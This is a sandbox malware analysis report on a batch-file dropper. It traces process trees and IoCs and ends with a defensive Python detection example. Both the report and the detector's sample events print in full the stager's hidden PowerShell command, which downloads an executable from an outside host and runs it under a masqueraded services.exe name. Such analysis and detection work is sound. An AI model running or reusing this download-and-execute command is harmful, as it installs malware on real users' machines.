Analysis
max time kernel: 509s
max time network: 406s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 26/07/2024, 17:48
Static task: static1

Behavioral task: behavioral1
  Sample: frdddd.bat
  Resource: win10-20240404-en

Behavioral task: behavioral2
  Sample: frdddd.bat
  Resource: win10v2004-20240709-en

Behavioral task: behavioral3
  Sample: frdddd.bat
  Resource: win11-20240709-en
General
Target: frdddd.bat
Size: 255B
MD5: 7cfc0e137d5d8b7f808add077083360b
SHA1: af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9
SHA256: 596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5
SHA512: 9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0
Malware Config
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  2     1736  powershell.exe
  14    4700  powershell.exe

Command and Scripting Interpreter: PowerShell (T1059.001; 1 TTP, 4 IoCs)
  Runs PowerShell with the console window hidden (-WindowStyle Hidden).
  pid   Process
  1736  powershell.exe
  4700  powershell.exe
  1736  powershell.exe
  4700  powershell.exe

Downloads MZ/PE file
  The URL in the PowerShell command ends in .img, but the body it returns is a PE executable; it is written to %TEMP%\services.exe and started.

Executes dropped EXE (4 IoCs)
  pid   Process
  4380  services.exe
  4836  services.exe
  3100  services.exe
  4164  services.exe
  Note: every one of these is C:\Users\Admin\AppData\Local\Temp\services.exe, a dropped binary that borrows the name of the Service Control Manager (the real services.exe lives only in C:\Windows\System32; masquerading, T1036.005). Its children are launched from C:\Windows\SysWOW64, so the dropped binary is a 32-bit image.

Drops file in Windows directory (2 IoCs)
  description   ioc                                                     Process
  File created  C:\Windows\rescache\_merged\4183903823\2290032291.pri   taskmgr.exe
  File created  C:\Windows\rescache\_merged\1601268389\715946058.pri    taskmgr.exe
  Note: attributed to taskmgr.exe (PID 4568), which is not in the sample's process lineage (see the process tree).

System Location Discovery: System Language Discovery (T1614.001; 1 TTP, 20 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  All 20 IoCs are "Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language", by process:
    cmd.exe       8
    services.exe  4
    PING.EXE      4
    WMIC.exe      4
  Note: the Windows-native cmd.exe, PING.EXE and WMIC.exe in the chain trigger this as readily as the dropped services.exe does, so treat it as low-signal corroboration rather than evidence of deliberate locale checking.

System Network Configuration Discovery: Internet Connection Discovery (T1016.001; 1 TTP, 8 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid   Process
  4208  cmd.exe
  1940  PING.EXE
  4692  cmd.exe
  516   PING.EXE
  2180  cmd.exe
  5064  PING.EXE
  5048  cmd.exe
  3972  PING.EXE
  Each cmd.exe/PING.EXE pair is the dropped services.exe running "cmd.exe /c ping -n 1 1.1.1.1": a single echo request to Cloudflare's public resolver to confirm outbound connectivity.

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description        ioc                                                                                                                                          Process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName                                           taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000                                                        taskmgr.exe
  Note: all three hits come from taskmgr.exe (PID 4568, started as "taskmgr.exe /4" at the top level of the process tree), not from the sample or anything it spawned; Task Manager reads the disk FriendlyName for its own display. The Ven_QEMU&Prod_HARDDISK device ID does reveal that the analysis VM is QEMU-backed and would be a trivial sandbox tell for a sample that looked, but this one did not.

Runs ping.exe (1 TTP, 4 IoCs)
  pid   Process
  3972  PING.EXE
  1940  PING.EXE
  516   PING.EXE
  5064  PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   Process         entries
  1736  powershell.exe  5
  4700  powershell.exe  5
  4568  taskmgr.exe     54

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid   Process
  4568  taskmgr.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid   Process         tokens enabled
  1736  powershell.exe  SeDebugPrivilege
  4840  WMIC.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this list is recorded twice)
  4700  powershell.exe  SeDebugPrivilege
  2252  WMIC.exe        the same list as PID 4840, ending at 35 because the listing stops at 64 entries
  Note: the numeric entries are privilege LUIDs the report did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege. The WMIC rows are identical for both invocations and do not depend on the query run; the one-liner itself contains no privilege manipulation, so none of these rows is a deliberate privilege-escalation step by the script.

Suspicious use of FindShellTrayWindow (64 IoCs)
  pid   Process
  4568  taskmgr.exe (all 64 entries)

Suspicious use of SendNotifyMessage (64 IoCs)
  pid   Process
  4568  taskmgr.exe (all 64 entries)

Suspicious use of WriteProcessMemory (61 IoCs)
  Each row is a parent writing into a child it has just created; the report records two or three writes per child and tags the child with an internal index (procid_target).
  parent pid  parent Process  child pid  writes  procid_target
  3220        cmd.exe         1736       2       76
  1736        powershell.exe  4380       3       77
  4380        services.exe    5048       3       78
  5048        cmd.exe         3972       3       79
  4380        services.exe    2008       3       80
  2008        cmd.exe         4840       3       81
  2320        cmd.exe         4700       2       89
  4700        powershell.exe  4836       3       90
  4836        services.exe    4208       3       91
  4208        cmd.exe         1940       3       92
  4836        services.exe    3520       3       93
  3520        cmd.exe         2252       3       94
  3100        services.exe    4692       3       98
  4692        cmd.exe         516        3       99
  3100        services.exe    652        3       100
  652         cmd.exe         4628       3       101
  424         cmd.exe         4164       3       106
  4164        services.exe    2180       3       107
  2180        cmd.exe         5064       3       108
  4164        services.exe    928        3       109
  928         cmd.exe         2696       3       110
  Note: the parent/child pairs are exactly the edges of the process tree below. This is the write a parent makes into a freshly created child during CreateProcess, not injection into an unrelated process: every target is the writer's own child.
Processes
Indentation follows the parent/child nesting; the bracketed number is the depth the report assigns. Under each process: its command line, then the signatures that fired on it.

[1] C:\Windows\system32\cmd.exe (PID 3220)
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1736)
      powershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\services.exe (PID 4380)
        "C:\Users\Admin\AppData\Local\Temp\services.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 5048)
          C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\PING.EXE (PID 3972)
            ping -n 1 1.1.1.1
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe
      [4] C:\Windows\SysWOW64\cmd.exe (PID 2008)
          C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 4840)
            wmic csproduct get uuid
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\rundll32.exe (PID 4176)
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    (no signatures)

[1] C:\Windows\system32\cmd.exe (PID 2320)
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\frdddd.bat" "
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4700)
      powershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\services.exe (PID 4836)
        "C:\Users\Admin\AppData\Local\Temp\services.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 4208)
          C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\PING.EXE (PID 1940)
            ping -n 1 1.1.1.1
            - System Location Discovery: System Language Discovery
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe
      [4] C:\Windows\SysWOW64\cmd.exe (PID 3520)
          C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2252)
            wmic csproduct get uuid
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\services.exe (PID 3100)
    "C:\Users\Admin\AppData\Local\Temp\services.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe (PID 4692)
      C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
      - System Location Discovery: System Language Discovery
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\PING.EXE (PID 516)
        ping -n 1 1.1.1.1
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe
  [2] C:\Windows\SysWOW64\cmd.exe (PID 652)
      C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 4628)
        wmic csproduct get uuid
        - System Location Discovery: System Language Discovery

[1] C:\Windows\system32\taskmgr.exe (PID 4568)
    "C:\Windows\system32\taskmgr.exe" /4
    - Drops file in Windows directory
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[1] C:\Windows\System32\cmd.exe (PID 424)
    "C:\Windows\System32\cmd.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\services.exe (PID 4164)
      services.exe
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe (PID 2180)
        C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\PING.EXE (PID 5064)
          ping -n 1 1.1.1.1
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
    [3] C:\Windows\SysWOW64\cmd.exe (PID 928)
        C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 2696)
          wmic csproduct get uuid
          - System Location Discovery: System Language Discovery

Reading the tree: frdddd.bat is executed twice (PIDs 3220 and 2320). Each run starts a hidden PowerShell that downloads https://pomf2.lain.la/f/fx2lvav.img to %TEMP%\services.exe and runs it with Start-Process -Wait, so the batch file is only a one-line stager and the behaviour of interest belongs to the dropped binary. That binary (32-bit, since its children are redirected to SysWOW64) does the same two things every time it runs: "ping -n 1 1.1.1.1" to confirm Internet connectivity and "wmic csproduct get uuid" to read the SMBIOS system UUID, a stable per-host identifier. The standalone services.exe entries (PID 3100, and PID 4164 launched from an interactive cmd.exe, PID 424) are re-executions of the already dropped file and show the same pair of commands. The rundll32.exe COM server (PID 4176) and taskmgr.exe /4 (PID 4568) are not descended from the sample.
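The chain above is easy to describe in process-creation telemetry: a hidden-window PowerShell that downloads and runs a file, an executable carrying a core Windows process name outside the system directories, and single-shot ping / wmic recon whose ancestor lives in a user-writable path. The following is an added example, not part of the sandbox report, that runs those three rules over constructed Sysmon-style events modelled on the first execution chain (PIDs 3220 through 4840), plus two benign events that must not fire. Rule names, the regular expressions, the list of masqueraded names and the ATT&CK mapping for the wmic query (T1082) are this example's own choices; the report itself tags only PowerShell, System Language Discovery and Internet Connection Discovery.

```python
"""Process-lineage rules for the frdddd.bat dropper chain (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


# Rule 1: PowerShell with a hidden window that fetches something and then launches it.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring", re.I)
LAUNCHER = re.compile(r"start-process|invoke-expression|\biex\b", re.I)

# Rule 2: a core Windows process name outside System32/SysWOW64 (T1036.005). The sample uses
# services.exe; the other names are common choices for the same trick. Assumes %SystemRoot% = C:\Windows.
MASQUERADE_NAMES = {"services.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Rule 3: the two recon commands the dropped binary runs, flagged only when some ancestor
# (the cmd.exe /c wrapper's parent, for example) runs from a user-writable directory.
PING_ONCE = re.compile(r"\bping(?:\.exe)?\s+-n\s+1\s+(\d{1,3}(?:\.\d{1,3}){3})\b", re.I)
WMIC_UUID = re.compile(r"\bwmic(?:\.exe)?\s+csproduct\s+get\s+uuid\b", re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\temp\\|\\programdata\\", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestors(pid: int, by_pid: dict[int, ProcEvent], max_depth: int = 6):
    """Yield ancestors nearest-first. PIDs are assumed unique within the event set;
    real telemetry should key on a process GUID because Windows reuses PIDs."""
    ev = by_pid.get(pid)
    for _ in range(max_depth):
        if ev is None or ev.ppid not in by_pid:
            return
        ev = by_pid[ev.ppid]
        yield ev


def detect(events: list[ProcEvent]) -> list[dict]:
    by_pid = {e.pid: e for e in events}
    hits: list[dict] = []
    for e in events:
        name = _basename(e.image)
        if (name == "powershell.exe" and HIDDEN_WINDOW.search(e.cmdline)
                and DOWNLOADER.search(e.cmdline) and LAUNCHER.search(e.cmdline)):
            hits.append({"rule": "hidden_powershell_download_and_run", "pid": e.pid, "attack": "T1059.001"})
        if name in MASQUERADE_NAMES and not e.image.lower().startswith(SYSTEM_DIRS):
            hits.append({"rule": "system_process_name_outside_system_dir", "pid": e.pid, "attack": "T1036.005"})
        ping, wmic = PING_ONCE.search(e.cmdline), WMIC_UUID.search(e.cmdline)
        if (ping or wmic) and any(USER_WRITABLE.search(a.image) for a in _ancestors(e.pid, by_pid)):
            hits.append({"rule": "recon_from_user_writable_ancestor", "pid": e.pid,
                         "attack": "T1016.001" if ping else "T1082"})
    return hits


# Constructed sample: the first chain from the report, then two benign events (the real
# Service Control Manager, and an admin pinging an internal host) that must stay quiet.
PS_CMD = ("powershell -WindowStyle Hidden -Command \"$tempFile = [System.IO.Path]::Combine("
          "[System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri "
          "'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait\"")
SAMPLE_EVENTS = [
    ProcEvent(3220, 1000, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"'),
    ProcEvent(1736, 3220, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(4380, 1736, r"C:\Users\Admin\AppData\Local\Temp\services.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\services.exe"'),
    ProcEvent(5048, 4380, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.1"),
    ProcEvent(3972, 5048, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 1 1.1.1.1"),
    ProcEvent(2008, 4380, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c wmic csproduct get uuid"),
    ProcEvent(4840, 2008, r"C:\Windows\SysWOW64\Wbem\WMIC.exe", "wmic csproduct get uuid"),
    ProcEvent(700, 500, r"C:\Windows\System32\services.exe", r"C:\Windows\system32\services.exe"),
    ProcEvent(9001, 9000, r"C:\Windows\System32\PING.EXE", "ping -n 4 intranet.example"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"{hit['rule']:40s} pid={hit['pid']:<5d} {hit['attack']}")
```

On the constructed events this yields six hits: the hidden PowerShell (1736), the masquerading services.exe (4380), and both the cmd.exe /c wrapper and the final binary for each recon command (5048 and 3972 for ping, 2008 and 4840 for wmic). The genuine C:\Windows\System32\services.exe and the four-packet ping to an internal host produce nothing. The lineage check is what keeps rule 3 quiet on ordinary administration: ping and wmic are common, but a parent running from AppData\Local\Temp is not.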
Network
MITRE ATT&CK Enterprise v15
Downloads
The report lists four files captured during the run without saying which request or path produced each one.

File 1
  Filesize: 3KB
  MD5: 4180fc1109043ba70ff0e5ff26a9e1f8
  SHA1: 799702b71147d7a5e8f1b71714a2b859909767d2
  SHA256: e1e2f4279d95c9f895c364e055769f17a9aefbb12e34cdebbefb9d345adc4836
  SHA512: fb74451d2dc999cf2db3e458ba98c272125a086c3b9561400a182221d1678485f4a8a41521ccf954706772c6f68fcbf41774aa446ff66044da42477bfc284364

File 2
  Filesize: 1KB
  MD5: aece9f8e9e62edea0f3703e245e1a208
  SHA1: 2af0a0b21427556b4263f095175f24503a21ca58
  SHA256: a0a51173f487e8c99c99cfb4d10d013ad60c90311461658f0e58fedc8b18d8f5
  SHA512: f4f2cffe4c318de2fe29f256db9c285b32d0e74de9ac8d37e614dd94f94afd914c848a29756de1e557550ac895788dc86f2875bb5f763324fc8fb3b3ec74758b

File 3
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
  These are the well-known digests of the single ASCII character "1", so this file carries no content worth pivoting on.

File 4
  Filesize: 4.5MB
  MD5: b85914d36703377812cba113ca4638b7
  SHA1: 3c68a49b599dac13f4cb7cd327ad7c9c15313381
  SHA256: 2ef086862494efd63cfacf30753bb2df9dd55f18d04e71fb912e79d47657b9d3
  SHA512: 45ae20f08b16c8056cf4cd5a7e65f4f6b593cf41ca63431d0db153ddcfbbf28b1bff92800093cf48ca4b66c35afd3a626862559a247052b2ff5dc4c426a29a07